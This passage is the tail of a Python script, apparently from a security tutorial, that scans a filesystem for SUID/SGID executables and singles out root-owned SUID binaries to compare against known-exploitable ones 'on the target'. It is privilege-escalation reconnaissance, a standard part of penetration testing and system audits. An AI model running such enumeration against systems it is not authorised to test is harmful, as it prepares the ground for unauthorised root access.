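    if mode & stat.S_ISVTX:
        found.add("sticky")
    return found


def escalation_relevant(mode: int) -> bool:
    """SUID or SGID on a regular file that is executable by someone."""
    return (stat.S_ISREG(mode)
            and bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
            and bool(special_bits(mode) & {"suid", "sgid"}))


def scan(root: str = "/") -> list:
    """Equivalent of: find / -type f \\( -perm -4000 -o -perm -2000 \\) 2>/dev/null

    Returns (path, owner uid, sorted bits) for each hit; unreadable
    directories and vanished files are skipped silently, as find would.
    """
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if escalation_relevant(st.st_mode):
                hits.append((path, st.st_uid, sorted(special_bits(st.st_mode))))
    return hits


def root_suid(hits: list) -> list:
    """The interesting subset: SUID binaries owned by uid 0."""
    return [h for h in hits if h[1] == 0 and "suid" in h[2]]


if __name__ == "__main__":
    found = scan("/usr/bin")     # assumed starting point; use "/" on the target
    for path, uid, bits in found:
        print("%s owner=%d %s" % (path, uid, ",".join(bits)))
    print("root-owned SUID:", [p for p, _, _ in root_suid(found)])
```

The classification works on the raw mode integer, so it can be checked without any special files present; on a live target the root-owned SUID list is what you compare against known-exploitable binaries, and anything unexpected (a copy of bash or a vendor helper in /opt) deserves a closer look.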